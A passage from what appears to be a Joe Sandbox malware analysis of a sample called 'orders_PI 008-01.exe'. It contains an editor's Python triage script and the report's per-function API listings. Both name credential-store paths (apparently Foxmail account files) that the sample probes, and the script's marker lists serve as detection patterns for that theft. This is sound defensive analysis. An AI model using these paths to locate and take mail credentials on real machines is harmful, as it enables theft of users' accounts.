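The function above is the one in this dump that matters to a responder: it builds paths ending in \Accounts\Account.rec0 and \Data\AccCfg\Accounts.tdat under \Mail\ and \Storage\ and then calls GetFileAttributesW, which is a probe for an on-disk mail-client credential store (those two file names are consistent with Foxmail account files; that identification is the editor's, the report itself does not name the client). The following Python is an added example, not Joe Sandbox output and not code from the sample. It parses function entries written in the shape of this report's listings (APIs lines with ref: addresses, Part of subcall lines, and the Similarity fields), then applies two triage rules: flag a function that combines a file-probe API with a known credential-store path, and separate the GetProcAddress(CorExitProcess) entry seen later in this dump, which is standard MSVC CRT shutdown code, from genuine attacker dynamic API resolution. The SAMPLE text, the CREDENTIAL_STORE_MARKERS table and the PROBE_APIS set are constructed for the example.

```python
"""Triage helper for Joe Sandbox style per-function API listings (editor's example)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the shape of the report's function entries (not tool output).
SAMPLE = r"""
APIs
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 344B122A
  • Part of subcall function 344B173A: _strlen.LIBCMT ref: 344B1855
Strings
Memory Dump Source
• Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
Similarity
• API ID: lstrlen$_strlenlstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• Opcode ID: 2bb473521429607bd98b50d2d0c45ed17edfb978ab6b09649e19f2a87a5a1161
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000), ref: 344B4B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 344B4B6C
• FreeLibrary.KERNEL32(00000000), ref: 344B4B8F
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• Opcode ID: ba489ef6f472eda00892128b86b92c5ed45a548e597b201e459779c0f6bcc6cb
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function X:".
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function ([0-9A-Fa-f]+):\s+)?"
    r"([A-Za-z_]\w*)\.([A-Z0-9_]+)(?:\((.*)\))?,?\s+ref:\s*([0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s+(API ID|String ID|Opcode ID|Source File):\s*(.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None   # set when the call sits in a callee, not this function


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    source_file: str = ""

    @property
    def strings(self) -> list:
        # The report joins a function's string references with '$'.
        return [s for s in self.string_id.split("$") if s] if self.string_id else []

    @property
    def api_names(self) -> set:
        # Only calls made directly by this function, not those inherited from subcalls.
        return {c.name for c in self.calls if c.subcall_of is None}


def parse_entries(text: str) -> list:
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # each function entry starts here
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            sub, name, mod, args, ref = m.groups()
            cur.calls.append(ApiCall(name, mod, args.split(",") if args else [], ref, sub))
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m.groups()
            setattr(cur, key.lower().replace(" ", "_"), val)
    return entries


# Lower-cased path fragments of on-disk credential stores; the Foxmail attribution is
# the example's own, extend with your own intel.
CREDENTIAL_STORE_MARKERS = {
    r"\accounts\account.rec0": "Foxmail account record",
    r"\data\acccfg\accounts.tdat": "Foxmail account config",
}
PROBE_APIS = {"GetFileAttributesW", "GetFileAttributesA", "CreateFileW", "FindFirstFileW"}
# Export lookups the MSVC CRT performs itself at shutdown; not attacker dynamic resolution.
CRT_RESOLVE_PAIRS = {("mscoree.dll", "CorExitProcess")}


def triage(entry: FunctionEntry) -> list:
    findings = []
    lowered = [s.lower() for s in entry.strings]
    hits = {label for marker, label in CREDENTIAL_STORE_MARKERS.items()
            if any(marker in s for s in lowered)}
    if hits and entry.api_names & PROBE_APIS:
        findings.append(("credential-store-probe", sorted(hits)))
    if "GetProcAddress" in entry.api_names:
        names = set(entry.strings)
        if any(dll in names and exp in names for dll, exp in CRT_RESOLVE_PAIRS):
            findings.append(("crt-boilerplate", ["GetProcAddress target is CRT exit hook"]))
        else:
            findings.append(("dynamic-api-resolution", sorted(names)))
    return findings


def triage_report(text: str) -> dict:
    """Map a short Opcode ID prefix (or first ref address) to that function's findings."""
    out = {}
    for e in parse_entries(text):
        key = e.opcode_id[:12] or (e.calls[0].ref if e.calls else "?")
        found = triage(e)
        if found:
            out[key] = found
    return out


if __name__ == "__main__":
    for key, found in triage_report(SAMPLE).items():
        print(key, found)
```

Run it over the text of a whole report (copy the function-listing section into a file and pass it to triage_report) to get a short list of functions worth opening in the dump, keyed by the Opcode ID prefix so the hit can be matched back to the entry. The crt-boilerplate rule exists because a naive "GetProcAddress plus an export name" rule fires on every MSVC binary; keep adding known-good pairs to CRT_RESOLVE_PAIRS rather than lowering the rule's weight.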
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,007B5800,007B3000,0040347D,007B5800,007B5800,004036EC,?,?,?,?), ref: 00406700
                                        • CharNextW.USER32(?,?,?,00000000,?,?,?,?), ref: 0040670F
                                        • CharNextW.USER32(?,00000000,75573420,007B5800,007B3000,0040347D,007B5800,007B5800,004036EC,?,?,?,?), ref: 00406714
                                        • CharPrevW.USER32(?,?,75573420,007B5800,007B3000,0040347D,007B5800,007B5800,004036EC,?,?,?,?), ref: 00406727
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3879383872.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000003.00000002.3879368188.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3879403378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3879455624.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3879598230.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3879598230.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":
                                        • API String ID: 589700163-165019052
                                        • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                        • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                        • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                        • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,344B4AEA,?,?,344B4A8A,?,344C2238,?,344B4BBD,00000000,00000000), ref: 344B4B59
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 344B4B6C
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,344B4AEA,?,?,344B4A8A,?,344C2238,?,344B4BBD,00000000,00000000,?,344B2082), ref: 344B4B8F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: ba489ef6f472eda00892128b86b92c5ed45a548e597b201e459779c0f6bcc6cb
                                        • Instruction ID: 7d5febd2b047da5c72610d86c84238e786e2b684fa23cb660e29c7b84265912b
                                        • Opcode Fuzzy Hash: ba489ef6f472eda00892128b86b92c5ed45a548e597b201e459779c0f6bcc6cb
                                        • Instruction Fuzzy Hash: 91F04FB5904108BFEF119F90DC08F9DBFB9EF04365F4041B8E985A6250DB319942CAA4
                                        APIs
                                        • _strlen.LIBCMT ref: 344B1607
                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,344B190E,?,?,00000000,?,00000000), ref: 344B1643
                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,344B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 344B165A
                                        • lstrlenW.KERNEL32(?,?,?,?,?,344B190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 344B1661
                                        • lstrcatW.KERNEL32(00001008,?,?,?,?,?,344B190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 344B1686
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrcatlstrlen$_strlen
                                        • String ID:
                                        • API String ID: 3802368996-0
                                        • Opcode ID: a1567807825ae95c29b14bfdef0aad0044982d200926203455d86ab8918dbb8c
                                        • Instruction ID: a99e09d7f26665e5f505bb9a711a2e74e73f9a6bbfbcca7569047034e651dc87
                                        • Opcode Fuzzy Hash: a1567807825ae95c29b14bfdef0aad0044982d200926203455d86ab8918dbb8c
                                        • Instruction Fuzzy Hash: CE21B676900204ABEF05DB64EC85EEE77B8EF88714F14447EE584AB141DB34A94287B9
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 344B715C
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 344B717F
                                          • Part of subcall function 344B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 344B5702
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 344B71A5
                                        • _free.LIBCMT ref: 344B71B8
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 344B71C7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 559945f9acbcc80aef46ebadd3bd48cedd77fda6c8bfcedffd1c16356bdbd768
                                        • Instruction ID: f1bc12e5698bceb3acdbb1e213a68a2c2e97d58e34222d647f17ec0dd155e0bb
                                        • Opcode Fuzzy Hash: 559945f9acbcc80aef46ebadd3bd48cedd77fda6c8bfcedffd1c16356bdbd768
                                        • Instruction Fuzzy Hash: BF01DFBAA01615BF3F114ABA5D88C7B7E6DDEC2AA6314017DBDC4DB300EE608C0281B4
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000000,344B636D,344B5713,00000000,?,344B2249,?,?,344B1D66,00000000,?,?,00000000), ref: 344B5B7F
                                        • _free.LIBCMT ref: 344B5BB4
                                        • _free.LIBCMT ref: 344B5BDB
                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B5BE8
                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B5BF1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: ed5441103a281c080745cf537594055cee8bf09432f1c61a024eacdcc58bd115
                                        • Instruction ID: 98c69ddcee1b69a7f0d05f50640e3ae9a6f50f378ac6a07497cb1ecf3f7f6e3f
                                        • Opcode Fuzzy Hash: ed5441103a281c080745cf537594055cee8bf09432f1c61a024eacdcc58bd115
                                        • Instruction Fuzzy Hash: D101F4BA208B01FFBF82A6346C84E1BAA2DDFC55BC714007CF8D5A6242EE74C8034538
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,?,344B10DF,?,?,?,00000000), ref: 344B1E9A
                                        • lstrcatW.KERNEL32(?,?,?,344B10DF,?,?,?,00000000), ref: 344B1EAC
                                        • lstrlenW.KERNEL32(?,?,344B10DF,?,?,?,00000000), ref: 344B1EB3
                                        • lstrlenW.KERNEL32(?,?,344B10DF,?,?,?,00000000), ref: 344B1EC8
                                        • lstrcatW.KERNEL32(?,344B10DF,?,344B10DF,?,?,?,00000000), ref: 344B1ED3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$lstrcat
                                        • String ID:
                                        • API String ID: 493641738-0
                                        • Opcode ID: 55d29587d23ea61db0544496b7632922afb6c23bf9053fbabf31dca3c38b6be2
                                        • Instruction ID: 184fcbf17b01f821d9e8de617ffabd749fbd706ddf0b4ba796cc7bd5f0174e72
                                        • Opcode Fuzzy Hash: 55d29587d23ea61db0544496b7632922afb6c23bf9053fbabf31dca3c38b6be2
                                        • Instruction Fuzzy Hash: 80F08966100514BBFB216729AC85E7F777CEFC5B64F44003DF588931909B54584392B9
                                        APIs
                                        • _free.LIBCMT ref: 344B91D0
                                          • Part of subcall function 344B571E: HeapFree.KERNEL32(00000000,00000000,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?), ref: 344B5734
                                          • Part of subcall function 344B571E: GetLastError.KERNEL32(?,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?,?), ref: 344B5746
                                        • _free.LIBCMT ref: 344B91E2
                                        • _free.LIBCMT ref: 344B91F4
                                        • _free.LIBCMT ref: 344B9206
                                        • _free.LIBCMT ref: 344B9218
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 32067ae8124b5d0d02e6bf893b65c1a25fff5e93ee5ff5f5da6515dd6416dbd7
                                        • Instruction ID: c57ab8a44dd6b9dbb7fc869c3a543667cae41553ea3f21a85a797645bb11b3c6
                                        • Opcode Fuzzy Hash: 32067ae8124b5d0d02e6bf893b65c1a25fff5e93ee5ff5f5da6515dd6416dbd7
                                        • Instruction Fuzzy Hash: 24F062B1655240EBAE54EB94D5C4C06BBD9EE043157944C3DF8C9E7601DB30FC908E78
                                        APIs
                                        • _free.LIBCMT ref: 344B536F
                                          • Part of subcall function 344B571E: HeapFree.KERNEL32(00000000,00000000,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?), ref: 344B5734
                                          • Part of subcall function 344B571E: GetLastError.KERNEL32(?,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?,?), ref: 344B5746
                                        • _free.LIBCMT ref: 344B5381
                                        • _free.LIBCMT ref: 344B5394
                                        • _free.LIBCMT ref: 344B53A5
                                        • _free.LIBCMT ref: 344B53B6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: d489d7786040d695e9bfa797ad12d3b5c413af2647f57827451bf5b80dee5f56
                                        • Instruction ID: 9d69c3c3311ea427a9b42e1f9419c7d1a0d9ab8674734b258d7b1360ded4b04b
                                        • Opcode Fuzzy Hash: d489d7786040d695e9bfa797ad12d3b5c413af2647f57827451bf5b80dee5f56
                                        • Instruction Fuzzy Hash: A7F01DB4924220FBFE81EB24D5C04487BA1EF0A62874D053AE8D1A3351EB354C138A9D
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\orders_PI 008-01.exe,00000104), ref: 344B4C1D
                                        • _free.LIBCMT ref: 344B4CE8
                                        • _free.LIBCMT ref: 344B4CF2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\orders_PI 008-01.exe
                                        • API String ID: 2506810119-4113895157
                                        • Opcode ID: 07760da488defcaff7a5db5a9c5914211d78b170f286ea315726776c33eec739
                                        • Instruction ID: d63a30dcae7fd273c891ecbf294dbe4a5bdc132a4fe6af50d0a28a6c16eca523
                                        • Opcode Fuzzy Hash: 07760da488defcaff7a5db5a9c5914211d78b170f286ea315726776c33eec739
                                        • Instruction Fuzzy Hash: D3314F75A00318FFEF12DB99D98099EBBBCEF85710B11417AE8C4A7311D6708A42CB75
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,344B6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 344B8731
                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 344B87BA
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 344B87CC
                                        • __freea.LIBCMT ref: 344B87D5
                                          • Part of subcall function 344B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 344B5702
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 626b0f8f5719df3a6916e9bc56cf15ade5532fa5a19765b748b218346a57728b
                                        • Instruction ID: 114c1383c69a134b9179bc55017c640dfa3237b08250c7c2548992907044a4ff
                                        • Opcode Fuzzy Hash: 626b0f8f5719df3a6916e9bc56cf15ade5532fa5a19765b748b218346a57728b
                                        • Instruction Fuzzy Hash: 62319CB6A0021AAFEF15CF65CC84EAF7BA5EB44358F10017DEC84DA290E735D951DBA0
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,344B1D66,00000000,00000000,?,344B5C88,344B1D66,00000000,00000000,00000000,?,344B5E85,?,FlsSetValue), ref: 344B5D13
                                        • GetLastError.KERNEL32(?,344B5C88,344B1D66,00000000,00000000,00000000,?,344B5E85,?,FlsSetValue,344BE190,FlsSetValue,00000000,00000364,?,344B5BC8), ref: 344B5D1F
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,344B5C88,344B1D66,00000000,00000000,00000000,?,344B5E85,?,FlsSetValue,344BE190,FlsSetValue,00000000), ref: 344B5D2D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 77cd19a87fa46fdf420a9ceafee39e3fb4a8020d80786014508e9f6954436322
                                        • Instruction ID: b2dac1e9983055d5bb9842874daf89541b98bd3efdcf77cb1dcd3546449fa019
                                        • Opcode Fuzzy Hash: 77cd19a87fa46fdf420a9ceafee39e3fb4a8020d80786014508e9f6954436322
                                        • Instruction Fuzzy Hash: 4C018876715722ABEF518A68AC48A46B79CEF057E9B104734F9C5E7240D730D803CAF4
                                        APIs
                                        • _free.LIBCMT ref: 344B655C
                                          • Part of subcall function 344B62BC: IsProcessorFeaturePresent.KERNEL32(?,344B62AB,00000000,?,?,?,?,?,?,?,344B62B8,00000000,00000000,00000000,00000000,00000000), ref: 344B62BE
                                          • Part of subcall function 344B62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 344B62E0
                                          • Part of subcall function 344B62BC: TerminateProcess.KERNEL32(00000000), ref: 344B62E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                        • String ID: *?$.
                                        • API String ID: 2667617558-3972193922
                                        • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                        • Instruction ID: c9656b252f224bbaedb0a0d0dbadc9b28e8f21e72ec75ccc49c59fce65c63d7b
                                        • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                        • Instruction Fuzzy Hash: 4651B175E00209EFEF04CFA8C881AADBBB5EF58354F24817DD8D4E7310E6359A018B61
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID: : $Se.
                                        • API String ID: 4218353326-4089948878
                                        • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                        • Instruction ID: b0493138b910081d0b0b410e6e1faab4cbf8a7d7a866953bab99c16e9317b66f
                                        • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                        • Instruction Fuzzy Hash: 9B11E775900248AEDF10CFA8D840BDDFBFCAF09204F10406AE5C5E7252E6705B02C775
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 344B2903
                                          • Part of subcall function 344B35D2: RaiseException.KERNEL32(?,?,?,344B2925,00000000,00000000,00000000,?,?,?,?,?,344B2925,?,344C21B8), ref: 344B3632
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 344B2920
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID: Unknown exception
                                        • API String ID: 3476068407-410509341
                                        • Opcode ID: 5b49f7822721f4015f60666693926154921ddeecd37f5eebdf2f2846befd5207
                                        • Instruction ID: 0add77be5b8f98c0e8ea98d6af8dd6ba3275969d79a2a801cdc503bb2a3d59d6
                                        • Opcode Fuzzy Hash: 5b49f7822721f4015f60666693926154921ddeecd37f5eebdf2f2846befd5207
                                        • Instruction Fuzzy Hash: 0DF0CD78A0070DBB9F04A6A5EC4C95E776C7F00650B904679E9D4D2191FF71EA16C5F0
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405F31
                                        • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,004034A0,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,007B5800,004036EC), ref: 00405F4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3879383872.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000003.00000002.3879368188.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879403378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879455624.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879598230.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879598230.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: nsa
                                        • API String ID: 1716503409-2209301699
                                        • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                        • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                        • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                        • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58
                                        APIs
                                        • GetOEMCP.KERNEL32(00000000,?,?,344B6C7C,?), ref: 344B6A1E
                                        • GetACP.KERNEL32(00000000,?,?,344B6C7C,?), ref: 344B6A35
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: |lK4
                                        • API String ID: 0-1935249415
                                        • Opcode ID: efdc6fccb99fa6530a1b5268ab78a00e0fe5b933f951e8bf0e1ec73f2a1dbddd
                                        • Instruction ID: 508657d75f60154e4dbde578709139b56e90a4d3c0c0f505a5437f33070ce9d1
